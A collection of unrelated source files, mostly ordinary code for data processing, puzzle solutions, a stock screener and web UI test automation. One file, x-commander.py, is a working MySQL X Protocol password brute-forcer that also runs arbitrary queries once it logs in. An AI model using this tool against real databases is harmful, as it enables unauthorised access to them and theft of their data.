               self._min_height < box.y1-box.y0 < self._max_height
    def get_candidates(self, document):
        """Get all candidates for a document."""
        if not hasattr(document, "id"):
            document.id = 0
        self._counts[document.id] = 0
        strip_labels = self.field.settings.strip_labels
        field = self.field
        # Only boxes inside the search area that contain one of the phrases.
        boxes = [box for box in self._boxes_in_bbox(document)
                 if self._has_phrase(box)]
        # Sort lines by descending y0, then ascending x0 (top-to-bottom,
        # left-to-right assuming PDF-style coordinates -- verify).
        key = lambda l: (-l.y0, l.x0)
        candidates = []
        for box in boxes:
            lines = sorted(box.get_lines(), key=key)
            for index in self._candidate_lines:
                try:
                    line = lines[index]
                    stripped = strip_labels(line.text)
                    preprocessed = [field.preprocess(text) for text in stripped]
                    matches = [field.find_value(text) for text in preprocessed]
                    if len(matches):
                        # NOTE(review): the per-document count is never
                        # incremented, so every candidate gets number 0 --
                        # confirm whether that is intended.
                        candidates.append(Candidate(line, field, matches[0], self.fid, self._counts[document.id]))
                except (IndexError, TypeError):
                    # No such line exists in this box! Don't produce a candidate.
                    pass
        return candidates
00e933ca78733095c4667986c19defe47fef890e | Python | anyeljm/ml_framework | /src/categorical_features.py | UTF-8 | 1,208 | 3.359375 | 3 | [] | no_license | import pandas as pd
from sklearn import preprocessing
class CategoricalFeatures():
    """
    Encode categorical columns of a DataFrame.

    df: pandas DataFrame
    categorical_features: list of columns to encode
    encoding_type: str -> 'label' or 'ohe'
    """
    def __init__(self, df, categorical_features, encoding_type):
        self.df = df
        self.cat_feats = categorical_features
        self.enc_type = encoding_type
        # Cast every column to string.  NOTE(review): after astype(str),
        # missing values have already become the string "nan", so the
        # trailing fillna("None") appears to be a no-op -- confirm intent.
        for c in self.df.columns:
            self.df.loc[:, c] = self.df.loc[:, c].astype(str).fillna("None")
    def processing(self):
        """Encode the categorical columns and return the transformed frame.

        'label': replace each listed column in-place with integer codes.
        'ohe': drop each listed column and append its one-hot columns.
        NOTE(review): the concat aligns on row index, so a non-default
        index on df would misalign rows -- verify callers pass a
        RangeIndex-ed frame.
        Raises for any other encoding type.
        """
        if self.enc_type == 'label':
            for c in self.cat_feats:
                lbl = preprocessing.LabelEncoder()
                self.df.loc[:, c] = lbl.fit_transform(self.df.loc[:, c].values)
            return self.df
        if self.enc_type == 'ohe':
            for c in self.cat_feats:
                ohe = preprocessing.OneHotEncoder()
                array = pd.DataFrame(ohe.fit_transform(self.df.loc[:, c].values.reshape(-1,1)).toarray())
                self.df = pd.concat([self.df.drop(c, axis=1), array], axis=1)
            return self.df
        else:
            raise Exception(f"Enconding type not implemented: {self.enc_type}")
| true |
3c03c1d7ab2693f3cdc9b4cb2c17c0bfeaf0a2ba | Python | skang6283/algorithm_daily | /Programmers/이중우선순위큐.py | UTF-8 | 1,364 | 2.875 | 3 | [] | no_license | from heapq import *
def solution(operations):
    """Simulate a double-ended priority queue.

    operations -- list of strings: "I n" inserts n, "D 1" deletes the
    current maximum, "D -1" deletes the current minimum (deletions on an
    empty queue are ignored).  Returns [max, min] of what remains, or
    [0, 0] when the queue ends up empty.

    The previous two-heap implementation mishandled its lazy-deletion
    bookkeeping and, in one final branch, popped from the (empty) max-heap
    instead of the min-heap, raising IndexError.  A single min-heap with an
    O(n) max-removal is simple and correct at this problem's scale.
    """
    heap = []
    for op in operations:
        cmd, value = op.split()
        num = int(value)
        if cmd == 'I':
            heappush(heap, num)
        elif heap:
            if num == 1:
                # Delete the current maximum.
                heap.remove(max(heap))
                heapify(heap)
            else:
                # Delete the current minimum.
                heappop(heap)
    if not heap:
        return [0, 0]
    return [max(heap), heap[0]]
041c7cecb4f11bafd6833dc6f57185974d29b522 | Python | Aradhya910/numberguesser | /numberguesser.py | UTF-8 | 868 | 4.4375 | 4 | [] | no_license | import random
# Pick the secret number and greet the player.
number = random.randint(1, 10)
player_name = input('What is your name? ')
number_of_guesses = 0
print('''Hello! ''' + player_name + " Let's start the game, Press W for instructions. " )
instructions = input('')
if instructions.upper() == 'W':
    print(''' You have to guess a random number between 1 to 10
    You only have 5 number of guesses! ''')
else:
    # Any other key aborts the game.
    print("I did not understand that, sorry ")
    quit()
# The counter is incremented before the checks and the loop runs while it
# is <= 4, so the player gets guesses 1 through 5.
while number_of_guesses <= 4:
    guess = int(input())
    number_of_guesses += 1
    if guess < number:
        print('The guess is low. ')
    if guess > number:
        print('The guess is high. ')
    if guess == number:
        break
# After the loop `guess` holds the final attempt.
if guess == number:
    print('You guessed the number in ' + str(number_of_guesses) + ' tries! ')
else:
    print('Alas you lost! The number was ' + str(number) + '. ')
3c2853dbdcb212742d5e19304b6ff909a70a3507 | Python | guoshan45/guoshan-pyschool | /For Loops/03.py | UTF-8 | 137 | 3.03125 | 3 | [] | no_license | def generateNumber(start,end,step):
if step>0:
return range(start,end+1,step)
else:
return range(start,end,step) | true |
b582cac348c496d522347c9389bb77a8e735cb20 | Python | thesubquery/advent_of_code | /aoc.py | UTF-8 | 3,685 | 3.21875 | 3 | [
"Apache-2.0"
] | permissive | # Python Standard Library
import argparse
import os
import sys
from collections import Counter
# pypi
# local modules
def get_input(file):
    """Read *file* and return its lines with surrounding whitespace stripped."""
    with open(file, 'r') as f:
        return [line.strip() for line in f]
if __name__ == "__main__":
# Command line options
# Create the parser
my_parser = argparse.ArgumentParser(prog='Advent_of_Code',
description='Solutions to Advent of Code problems.')
# Add positional arguments
my_parser.add_argument('year', type=int, help='Year 2015 to 2020', choices=range(2015, 2021))
my_parser.add_argument('day', type=int, help='Day 1 through 25', choices=range(1, 26))
my_parser.add_argument('part', type=int, help='Part 1 or 2', choices=range(1, 3))
my_parser.add_argument('input_file', type=str, help='Path to input file')
# Add optional arguments
my_parser.add_argument('-v', '--verbose', action='store_true', help='an optional argument')
# Execute the parse_args() method
args = my_parser.parse_args()
# Check if file exists
path = os.path.join(os.getcwd(), args.input_file)
if not os.path.isfile(path):
print('The path specified does not exist: {}'.format(path))
sys.exit()
aoc_year = args.year
aoc_day = args.day
aoc_part = args.part
if aoc_year == 2015:
from aoc_2015 import *
elif aoc_year == 2016:
from aoc_2016 import *
elif aoc_year == 2017:
from aoc_2017 import *
elif aoc_year == 2018:
from aoc_2018 import *
elif aoc_year == 2019:
from aoc_2019 import *
elif aoc_year == 2020:
from aoc_2020 import *
# Solutions nested by day and part number
solutions = {i: {1: f"Day: {i} Part 1", 2: f"Day: {i} Part 2"} for i in range(1, 26)}
# Map functions to solutions
solutions[1][1] = day_1
solutions[1][2] = day_1
solutions[2][1] = day_2
solutions[2][2] = day_2
solutions[3][1] = day_3
solutions[3][2] = day_3
solutions[4][1] = day_4
solutions[4][2] = day_4
solutions[5][1] = day_5
solutions[5][2] = day_5
solutions[6][1] = day_6
solutions[6][2] = day_6
solutions[7][1] = day_7
solutions[7][2] = day_7
solutions[8][1] = day_8
solutions[8][2] = day_8
solutions[9][1] = day_9
solutions[9][2] = day_9
solutions[10][1] = day_10
solutions[10][2] = day_10
solutions[11][1] = day_11
solutions[11][2] = day_11
solutions[12][1] = day_12
solutions[12][2] = day_12
solutions[13][1] = day_13
solutions[13][2] = day_13
solutions[14][1] = day_14
solutions[14][2] = day_14
solutions[15][1] = day_15
solutions[15][2] = day_15
solutions[16][1] = day_16
solutions[16][2] = day_16
solutions[17][1] = day_17
solutions[17][2] = day_17
solutions[18][1] = day_18
solutions[18][2] = day_18
solutions[19][1] = day_19
solutions[19][2] = day_19
solutions[20][1] = day_20
solutions[20][2] = day_20
solutions[21][1] = day_21
solutions[21][2] = day_21
solutions[22][1] = day_22
solutions[22][2] = day_22
solutions[23][1] = day_23
solutions[23][2] = day_23
solutions[24][1] = day_24
solutions[24][2] = day_24
solutions[25][1] = day_25
solutions[25][2] = day_25
# Print input
if args.verbose:
data = get_input(path)
for d in enumerate(data):
print(d)
# Get data from input file
data = get_input(path)
# Execute solution
sol = solutions[args.day][args.part]
res = sol(args.part, data)
print(f"Year: {aoc_year} Day: {aoc_day} Part: {aoc_part} Solution: {res}")
| true |
b622cc6ebe4ae25eeb062ce015b711cea2d62871 | Python | zkatemor/thesaurus | /total_statistic.py | UTF-8 | 1,770 | 3.125 | 3 | [] | no_license | import json
def get_union(dict_first, dict_second):
    """Return the union of the two dicts' keys as a list.

    Keys of dict_first come first (in iteration order), followed by the
    keys that appear only in dict_second.  The previous nested-loop
    version never added dict_second's exclusive keys and contained an
    unreachable-intent `break`, so it effectively returned only
    dict_first's keys.
    """
    union = list(dict_first)
    for word in dict_second:
        if word not in union:
            union.append(word)
    return union
def get_intersections(dict_first, dict_second):
    """Return the keys present in both dicts with equal values.

    Order follows dict_first's iteration order.  An O(1) dict lookup
    replaces the previous O(n^2) scan over every key pair; the output is
    identical (dict keys are unique, so no duplicate check is needed).
    """
    return [word for word in dict_first
            if word in dict_second and dict_first[word] == dict_second[word]]
# Load the chi-square sentiment lexicons (positive / negative word lists)
# that were built earlier and saved as JSON.
with open('chi_square_dicts/chi_dict_plus.json', 'r', encoding='utf-8') as f:
    chi_dict_plus = json.load(f)
with open('chi_square_dicts/chi_dict_minus.json', 'r', encoding='utf-8') as f:
    chi_dict_minus = json.load(f)
# Build one combined dictionary mapping word -> sentiment label (each JSON
# entry is a sequence whose first item is the word).  Positive entries are
# applied last, so a word in both lists ends up 'positive'.
chi_dictionary = {}
for word in chi_dict_minus:
    chi_dictionary[word[0]] = 'negative'
for word in chi_dict_plus:
    chi_dictionary[word[0]] = 'positive'
with open('tagged_dictionary/tagged_dictionary.json', 'r', encoding='utf-8') as f:
    cnn_dictionary = json.load(f)
# NOTE(review): the a/b/c block below looks like leftover experimentation
# with dict.copy()/update(); its results are never used.
a = {'a': 0, 'b': '2'}
b = {'c': 2, 'b': 1}
c = a.copy()
a.update(b)
chi = chi_dictionary.copy()
chi.update(cnn_dictionary)
print(len(get_intersections(chi_dictionary, cnn_dictionary)))
print(len(get_union(chi_dictionary, cnn_dictionary)))
| true |
6a0e2624aa02bf97922a7a1448c0665661affa95 | Python | tildesarecool/ReallyHadtoPython | /automate boring stuff/lesson 30 chapter 8 filenames and paths.py | UTF-8 | 6,923 | 3.4375 | 3 | [] | no_license | # filenames and absolute/relative file paths
# lesson 30 / chapter 8
# pages ??
#
# summmary
# ? = says group matches zero or one times
# * = zero or more times
# + = one or more times
# { } = match specific number of times
# { } w/ some number matches minimum and max number of times
# leaving out first or seond number in curly braces says there is no min or max
# "greedy" matching will match logest string possible
# "nongreed" matching will match shortest string possible
# putting ? after curly braces makes it do a nongreedy match
# notes:
# search returns match objects
# findall returns list of strings
# behavrior for regex objects that have or one groups in them (groups being with the \d\d\d inside () ) is
# find all returns list of strings will just be text foundmatching that pattern
# see lesson 26 around 3 minutes in for phrasing with on-screen "correction"
#sfindallMatchesEx2 = phoneRegex2.findall(LongSringExample)
# returns have strings, tuples
# has zero or one groups == list of strings
# if has two or more groups list of tuples of strings
# character classses
#digitRegex = re.compile('(0|1|2|3|4|5|6|7|8|9') # same is /d
# table 7-1 in the book
# /D (cap D) is "any character not numberic between 0 and 9"
# /w is "any letter, numberic digit or underscore character" referred to as "word"
# /W (cap W) "any character that is NOT a letter, numberic digit or underscore character"
# /s any space, tab or newline character (e.g. "matching the space characters")
# /S (cap S) any character NOT space, tab or newline character (e.g. "matching the space characters")
# make custom/own character classes with [] e.g. [aeiou]
# a caret ^ makes a negative character class, matching anything NOT in the backets, like [^aeiou] for all non-vowels
# having period/dot means "any character not newline"
#atRegex = re.compile('.at')
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(atResult)
# altered version so that output matches with whole of 'flat' instead of just the 'lat' portion of 'flat'
# this also matches spaces
#atRegex = re.compile(r'.{1,2}at')
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(atResult)
# .* notation is all the stuff
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(dotstarResult)
# output
# [('Al', 'Swagger')]
# notes
# (.*) is greedy mode - "match as much text as possible"
# (.*?) is non-greedy mode
# also the INGORECASE option
# ^ means string must start with the pattern, $ means the string must end with the pattern
# both means the entire string must match the pattern
#
# The . dot is a wildcard; it matches anything except newlines
# pass re.DOTALL as the second argument to re.compile() to make the . dot match newlines too
#
# pass re.I (for INGORECASE) as second argument to re.compile() to make the matching non-case-sensitive
#
# the sub() method
# namesRegEx = re.compile(r'Agent \w+')
# nameresult = namesRegEx.findall('Agent Alice gave the secret documents to Agent Bob')
# print(nameresult)
# output
# ['Agent Alice', 'Agent Bob']
# namesRegEx = re.compile(r'Agent \w+')
# nameresult = namesRegEx.sub('REDACTED', 'Agent Alice gave the secret documents to Agent Bob')
# print(nameresult)
# Successful find/replace output
# REDACTED gave the secret documents to REDACTED
#################### Using \1 \2 etc in sub()
## namesRegEx = re.compile(r'Agent (\w)\w*')
# this would just be
# # nameresult = namesRegEx.findall('Agent Alice gave the secret documents to Agent Bob')
# output 'A' and 'B' (for alice and bob)
# the \1 refers to the first group
## nameresult = namesRegEx.sub(r'Agent \1****', 'Agent Alice gave the secret documents to Agent Bob')
## print(nameresult)
# so it iwill be first letter and asterisks instead of redacted
# output
# Agent A**** gave the secret documents to Agent B****
####################### Verbose Mode with re.VERBOSE
# verbose can be used in place of that \d\d\d in the phone numbers example
# recap
# the sub() regex method will substitute matches with some other text
# using \1, \2, and so on will substitute group 1,2, etc in regex pattern
# passing re.VERBOSE lets you add whitespace and comments to the regex string passed re.compile()
# if you want to pass multiple arguments (re.DOTALL, re.IGNORECASE etc) combine with the | bitwise operator
# the bitwise OR isn't really used any other place in python language
# scaping the PDF sample phone/email directory data
# not sure why he didn't make it a text file to start with but whatever i converted pdf to txt file
#
#
#
#! python3
# in windows paths have to be escaped
# like c:\\spam
# can always use the raw string like r'c:\spam\eggs.png
# for windows could use this to build up a path
#winPath ='\\'.join(['folder1', 'folder2', 'folder3', 'file.png']) # windows only
#print(winPath)
# output:
# folder1\folder2\folder3\file.png
# ideal would want this to work on more than just windows
from decimal import ROUND_DOWN
from math import floor
import os
from unicodedata import decimal
# this includes os.path.join
#os.path.join('folder1', 'folder2', 'folder3', 'file.png')
#print(os.sep)
#curpath = os.getcwd() # get current working directory
#print(curpath)
#changeToWindows =
#os.chdir(curpath + '..') # not sure how to use this function. doesn't seem to do anything
#changeToWindows
# there's also
#os.path.abspath() # returns absolute path of what you pass in, like a file name
# and
#os.path.isabs() # I assume returns whether or not a path is an absolute (string)
# functions
#os.path.relpath('c:\\folder1\\folder2\\spam.png', 'c:\\folder1')
# returns folder2\\spam.png
# also
#os.path.dirname('c:\\folder1\\folder2\\spam.png') # just returns c:\\folder1\\folder2
# and
#os.path.basename('c:\\folder1\\folder2') # just 'folder2', thing after final slash
#os.path.exists('c:\\folder1\\folder2\\spam.png') # standard ifexist sort of text
# these two seems kind of self-explanatory
#os.path.isfile() # is file?
#os.path.isdir() # is directory?
#os.path.getsize() # pass in file and it returns int size in bytes
#getlist = os.listdir('.') # pass in folder and it will return list of strings that inculdes files/folders
#print(getlist)
# this did return list of files/folders inside current directory which was c:\Python310
#samplePath = 'C:\\Users\\Keith\\Documents\\repos\\ReallyHadtoPython\\automate boring stuff'
# Use a raw string so the backslashes are taken literally: the original
# 'c:\windows\system32' only worked because \w and \s happen not to be
# escape sequences, and it triggers a DeprecationWarning on newer Pythons.
samplePath = r'c:\windows\system32'
# Sum the sizes of all regular files in samplePath, skipping subdirectories.
totalSize = 0
for filename in os.listdir(samplePath):
    fullPath = os.path.join(samplePath, filename)
    if not os.path.isfile(fullPath):
        continue
    totalSize = totalSize + os.path.getsize(fullPath)
# Convert bytes to KiB; round() trims the long fractional part for display
# (this was the open question in the original commented-out attempts).
calcSize = round(totalSize / 1024, 2)
print(calcSize)
# os.makedirs(path) creates folders (relative or absolute). Calling it with
# no argument raises TypeError, so keep the example commented out:
# os.makedirs(r'c:\temp\new_folder')
879110f3e0fc99a0b3ed0f2c52621efe1bf0560f | Python | javenonly/stock | /src/old/GetTodayAll_N4.py | UTF-8 | 5,918 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python
#coding:utf-8
import socket
import urllib
import tushare as ts
import pandas as pd
from time import sleep
import datetime
import tkinter
import tkinter.messagebox #这个是消息框,对话框的关键
# Stock screener: for every listed code, pull today's real-time quote via
# tushare and compare it against cached daily history (CSV files under
# C:/stock_data/<var_date>/); print the codes matching a volume/price pattern.
# Date string used as the folder name of the cached history data.
var_date = '20180627'
# Required ratio: today's volume must exceed each recent day's volume * this.
volume_up_rate = 1
# On/off switch for the volume ratio check (currently unused).
# volume_up_rate_lock = False
# Scale factor applied to historical highs when comparing with today's high.
high_price_rate = 0.97
# Upper bound on today's gain (current price / previous close).
up_price_high = 1.07
# Maximum allowed upper-shadow (wick) ratio of today's candle.
up_line_rate = 0.3
# Read the list of all stock codes.
df_stock = pd.DataFrame(pd.read_csv('C:/stock_data/all_code.csv', index_col=None))
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) # formatted start timestamp
for stockCode in df_stock.code:
    # print('code-------------'+"%06d"%stockCode)
    try:
        df_today = ts.get_realtime_quotes("%06d"%stockCode) # fetch the real-time quote for this stock
        # print(df_today)
        # Real-time volume; the raw figure is divided by 100
        # (presumably shares -> lots, to match the history CSVs -- TODO confirm).
        volume_today = int(df_today.iloc[0].volume)/100
        # print('volume_today-----------'+str(volume_today))
        # Today's highest price.
        high_today = df_today.iloc[0].high
        # Today's current price.
        price_today = df_today.iloc[0].price
        # print('high_today-----------'+str(high_today))
        # Load this stock's historical daily data from its cached CSV file.
        df_history = pd.DataFrame(pd.read_csv('C:/stock_data/' + var_date + '/' + "%06d" % stockCode + '.csv', index_col=None))
        # Volumes of the previous four trading days.
        volume_yestoday_1 = df_history.iloc[0].volume
        volume_yestoday_2 = df_history.iloc[1].volume
        volume_yestoday_3 = df_history.iloc[2].volume
        volume_yestoday_4 = df_history.iloc[3].volume
        # Highest prices of the previous ten trading days.
        high_yestoday_1 = df_history.iloc[0].high
        high_yestoday_2 = df_history.iloc[1].high
        high_yestoday_3 = df_history.iloc[2].high
        high_yestoday_4 = df_history.iloc[3].high
        high_yestoday_5 = df_history.iloc[4].high
        high_yestoday_6 = df_history.iloc[5].high
        high_yestoday_7 = df_history.iloc[6].high
        high_yestoday_8 = df_history.iloc[7].high
        high_yestoday_9 = df_history.iloc[8].high
        high_yestoday_10 = df_history.iloc[9].high
        if (
                # Today's volume is a surge: above each of the previous
                # 1-4 days' volume scaled by volume_up_rate.
                (volume_today > volume_yestoday_1 * volume_up_rate)
                and (volume_today > volume_yestoday_2 * volume_up_rate)
                and (volume_today > volume_yestoday_3 * volume_up_rate)
                and (volume_today > volume_yestoday_4 * volume_up_rate)
                # Today's high is above each of the previous 10 days' highs
                # scaled by high_price_rate.
                and (float(high_today) > float(high_yestoday_1) * high_price_rate)
                and (float(high_today) > float(high_yestoday_2) * high_price_rate)
                and (float(high_today) > float(high_yestoday_3) * high_price_rate)
                and (float(high_today) > float(high_yestoday_4) * high_price_rate)
                and (float(high_today) > float(high_yestoday_5) * high_price_rate)
                and (float(high_today) > float(high_yestoday_6) * high_price_rate)
                and (float(high_today) > float(high_yestoday_7) * high_price_rate)
                and (float(high_today) > float(high_yestoday_8) * high_price_rate)
                and (float(high_today) > float(high_yestoday_9) * high_price_rate)
                and (float(high_today) > float(high_yestoday_10) * high_price_rate)
                # ...but today's high is still below at least one of those
                # 10 highs (i.e. not yet a clean 10-day breakout).
                and (float(high_today) < float(high_yestoday_1)
                     or float(high_today) < float(high_yestoday_2)
                     or float(high_today) < float(high_yestoday_3)
                     or float(high_today) < float(high_yestoday_4)
                     or float(high_today) < float(high_yestoday_5)
                     or float(high_today) < float(high_yestoday_6)
                     or float(high_today) < float(high_yestoday_7)
                     or float(high_today) < float(high_yestoday_8)
                     or float(high_today) < float(high_yestoday_9)
                     or float(high_today) < float(high_yestoday_10))
                # Current price is above today's open.
                # NOTE(review): price/open come back from tushare as strings,
                # so this comparison is lexicographic; the other checks use
                # float() -- confirm whether this is intended.
                and (df_today.iloc[0].price > df_today.iloc[0].open)
                # Today's gain stays below up_price_high
                # (the lower-bound check is currently disabled).
                # and (float(df_today.iloc[0].price) / float(df_today.iloc[0].pre_close) > up_price_low)
                and (float(df_today.iloc[0].price) / float(df_today.iloc[0].pre_close) < up_price_high)
                # Yesterday's high is below at least one of the highs of
                # days 2-10 back.
                and (high_yestoday_1 < high_yestoday_2
                     or high_yestoday_1 < high_yestoday_3
                     or high_yestoday_1 < high_yestoday_4
                     or high_yestoday_1 < high_yestoday_5
                     or high_yestoday_1 < high_yestoday_6
                     or high_yestoday_1 < high_yestoday_7
                     or high_yestoday_1 < high_yestoday_8
                     or high_yestoday_1 < high_yestoday_9
                     or high_yestoday_1 < high_yestoday_10)
                # Today's upper-shadow (wick) ratio is below up_line_rate.
                and ((float(df_today.iloc[0].high) - float(df_today.iloc[0].price)) / (float(df_today.iloc[0].high) - float(df_today.iloc[0].low)) < up_line_rate)):
            print('code-------------' + "%06d" % stockCode)
            # print('long')
        # else:
        #     print('not')
    except IndexError:
        continue
    except FileNotFoundError:
        continue
    except socket.timeout:
        # print('timeout-------------' + "%06d" % stockCode)
        continue
    except urllib.error.URLError:
        # print('URLError-------------' + "%06d" % stockCode)
        continue
    except ZeroDivisionError:
        continue
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) # formatted end timestamp
f782ba01781cd158c663990d7e2a70f4e57affa9 | Python | Aasthaengg/IBMdataset | /Python_codes/p02682/s024029716.py | UTF-8 | 188 | 2.984375 | 3 | [] | no_license | import sys
# Read the four integers a, b, c, k from the single line on standard input.
# (split() on bytes handles the trailing newline, so no explicit rstrip.)
a, b, c, k = (int(token) for token in sys.stdin.buffer.readline().split())
# Pick the output by which band k falls into.
if k <= a:
    # k does not exceed a.
    print(k)
elif k <= a + b:
    # k is between a (exclusive) and a + b (inclusive).
    print(a)
else:
    # k exceeds a + b: subtract the overshoot from a.
    print(a - (k - (a + b)))
| true |
47419c023908c84574eef3512fed0cead95ff0ac | Python | rvrsh3ll/X-Commander | /x-commander.py | UTF-8 | 3,146 | 2.71875 | 3 | [
"BSD-3-Clause"
] | permissive | import mysqlx
import argparse
def Brute(target, targetport, user, password, passwordfile, stop, verbose):
    """Try every password from *passwordfile* against the MySQL X endpoint.

    Each successful candidate is printed; when *stop* is true the loop ends
    after the first hit.  When *verbose* is true failed attempts are printed
    with their error instead of being silently skipped.
    """
    with open(passwordfile, "r") as handle:
        # Load all candidate passwords up front.
        candidates = handle.readlines()
    for candidate in candidates:
        settings = {
            'host': target,
            'port': targetport,
            'user': user,
            'password': candidate.rstrip()
        }
        try:
            # Attempt a connection with this candidate, then tidy up.
            session = mysqlx.get_session(settings)
            session.close()
        except Exception as err:
            if verbose:
                print("Connection failed with error: {}".format(err))
            continue
        print("Connection success with password: {}".format(candidate))
        if stop:
            break
def Query(target, targetport, user, password, database, query):
    """Run *query* over the MySQL X Protocol and print every result cell.

    When *database* is given, a ``USE`` statement selects that schema first.
    Connection or execution errors are printed rather than raised.
    """
    try:
        session = mysqlx.get_session({
            'host': target,
            'port': targetport,
            'user': user,
            'password': password
        })
        if database:
            # Switch to the requested schema before running the query.
            # NOTE: the schema name is interpolated directly into the SQL
            # string -- fine for this offensive tool, never for app code.
            session.sql("USE {}".format(database)).execute()
        # Execute the query and print every cell of every returned row.
        outcome = session.sql(query).execute()
        for row in outcome.fetch_all():
            for column in outcome.columns:
                print(row.get_string(column.get_column_name()))
        # Cleanup session.
        session.close()
    except Exception as err:
        # Surface the failure for troubleshooting instead of raising.
        print("Connection failed with error: {}".format(err))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', type=str, required=True)
parser.add_argument('-p', '--port', type=int, default=33060, required=False)
parser.add_argument('-u', '--user', type=str, required=True)
parser.add_argument('-P', '--password', type=str, required=False)
parser.add_argument('-f', '--passwordfile', type=str, required=False)
parser.add_argument('-d', '--database', type=str, required=False)
parser.add_argument('-q', '--query', type=str, required=False)
parser.add_argument('-s', '--stoponsuccess', action='store_true', required=False)
parser.add_argument('-v', '--verbose', action='store_true', required=False)
args = parser.parse_args()
if args.query:
Query(args.target,args.port,args.user,args.password,args.database,args.query)
else:
Brute(args.target,args.port,args.user,args.password,args.passwordfile,args.stoponsuccess,args.verbose) | true |
5c64a4abfbd216eb89c925c392e4f7534b4487b3 | Python | 207772389/my_tp_shop | /page/page_add_pd.py | UTF-8 | 7,613 | 2.640625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@Time : 2021/8/5 16:31
@Auth : cainiao
@File :page_add_pd.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
import page
from base.web_base import WebBase
from time import sleep
from tools.get_log import GetLog
log = GetLog.get_logger()
class PageAddPd(WebBase):
    """Page object for creating a product and its SKUs in the shop admin UI.

    Wraps low-level WebBase click/input actions with business-level steps:
    create a product, create a SKU, then walk both through the approval
    flow until they are "on sale".
    """
    # Click the "create" button on the product list page.
    def addpd_click_add_btn(self):
        self.base_click(page.pd_list_add_btn)
    # Enter the product title.
    def addpd_input_pd_title(self, pdtitle):
        sleep(1)
        self.base_input(page.pd_adding_pd_title, pdtitle, ele=2)
    # Select the product type.
    def addpd_choose_pd_type(self):
        # Click the input box first.
        self.base_click(page.pd_adding_pd_type)
        # Then pick the "service" category from the dropdown list.
        self.base_click(page.pd_adding_pd_typevalue)
    # Select the warm-up (pre-sale) time range.
    def addpd_choose_time(self):
        # Open the date-picker dialog first.
        self.base_click(page.pd_adding_click_data)
        # Pick the start and end dates from the picker.
        # NOTE: the end date is currently always the last selectable date;
        # no better approach has been found yet.
        self.base_click(page.pd_adding_start_data)
        self.base_click(page.pd_adding_end_data)
        # Confirm the selection.
        self.base_click(page.pd_adding_date_ok)
    # Select the user-evaluation option.
    def addpd_choose_evaluation(self):
        self.base_click(page.pd_adding_evluation)
    # Enter the product name.
    def addpd_input_pd_name(self, value):
        self.base_input(page.pd_adding_pd_name, value, 3)
    # Enter the share title.
    def addpd_input_share_title(self, value):
        self.base_input(page.pd_adding_share_title, value)
    # Enter the share description.
    def addpd_input_share_info(self, value):
        self.base_input(page.pd_adding_share_info, value)
    # Click the save button.
    def addpd_click_save_btn(self):
        self.base_click(page.pd_adding_save_btn)
    # Click the OK button on the confirmation dialog.
    def addpd_click_makesure_ok(self):
        self.base_click(page.pd_adding_makesure_ok)
    # Composite business flow: fill in and save a new product.
    def addpd_test(self, pdtitle, pdname, sharetitle, shareinfo):
        log.info("正在调用新增商品的业务组合方法")
        self.base_click(page.pd_list_add_btn)
        self.addpd_input_pd_title(pdtitle)
        self.addpd_choose_pd_type()
        self.addpd_choose_time()
        self.addpd_choose_evaluation()
        self.addpd_input_pd_name(pdname)
        self.addpd_input_share_title(sharetitle)
        self.addpd_input_share_info(shareinfo)
        self.addpd_click_save_btn()
        self.addpd_click_makesure_ok()
    # After creating a product, back on the product list: filter by status
    # "editing" -- the first product in that state is the newly created one.
    def addpd_click_status(self):
        log.info("正在切换状态。。。")
        # Click the status filter first.
        self.base_click(page.pd_list_status)
        # Choose "editing" from the dropdown.
        self.base_click(page.pd_list_choose_status, 1)
    # Fetch the name of the product in "editing" state (used by assertions).
    def addpd_get_pd_name(self):
        log.info("正在获取商品列表的商品名称")
        # First call the method above to switch the status filter to "editing".
        # self.addpd_click_status()
        return self.base_get_text(page.pd_list_pd_name, 3)
    # --- Product created successfully; the steps below create its SKU. ---
    """至此,商品新建成功了,以下开始新建sku"""
    # After the product exists, start creating a SKU: click "SKU manage".
    def addpd_click_addsku_manage(self):
        log.info("开始新建新建sku了")
        self.base_click(page.pd_list_sku_manage, 1)
    # On the SKU management page, click "new SKU".
    def addpd_click_addsku(self):
        self.base_click(page.pd_list_add_sku)
    # Enter the new-SKU form.
    def addpd_click_addsku_btn(self):
        self.base_click(page.pd_list_addsku_btn)
    # On the SKU edit page: enter the camp period.
    def addpd_input_sku_period(self, period):
        self.base_input(page.pd_list_addsku_period, period)
    # Select the camp start time.
    def addpd_choose_sku_starttime(self):
        # Open the date picker first.
        self.base_click(page.pd_list_addsku_starttime_btn)
        # Then pick the date.
        self.base_click(page.pd_list_addsk_choose_starttime)
        # Confirm on the picker.
        self.base_click(page.pd_list_addsku_starttime_ok)
    # Enter the SKU name.
    def addpd_input_skuname(self, skuname):
        self.base_input(page.pd_list_addsku_skuname, skuname)
    # Enter the original price.
    def addpd_input_origin_price(self, originprice):
        self.base_input(page.pd_list_addsku_originprice, originprice)
    # Enter the special (discount) price.
    def addpd_input_especial_price(self, especialprice):
        self.base_input(page.pd_list_addsku_especialprice, especialprice)
    # Click the upper save button.
    def addpd_addsku_first_savebtn(self):
        self.base_click(page.pd_list_addsku_first_savebtn)
    # Click the lower save button.
    def addpd_addsku_second_savebtn(self):
        log.info("sku新建成功了,sku is done!")
        self.base_click(page.pd_list_addsku_second_savebtn)
    # --- SKU created; back on the SKU list, submit it for approval and put
    # it on sale. ---
    """至此,sku就新建完成了,返回到了sku列表页面,以下开始提交sku到上架状态"""
    # Click "submit for approval".
    def addpd_skulist_click_sp(self):
        sleep(1)
        self.base_click(page.pd_list_addsku_skulist_sp)
    # After review, click "approve".
    def addpd_skulist_click_pass(self):
        sleep(1)
        self.base_click(page.pd_list_addsku_skulist_pass_sp)
    # Once approved, click "put on sale".
    def addpd_skulist_click_sj(self):
        log.info("恭喜,sku已经成功上架了!!!")
        sleep(1)
        self.base_click(page.pd_list_addsku_skulist_sj)
    # --- SKU is on sale; return to the product list and put the product
    # itself on sale. ---
    """至此,sku状态变为上架了,点击 商品列表 回到商品列表页面,开始把商品状态变为上架"""
    # Click "product list" in the left navigation bar.
    def addpd_click_pdlist(self):
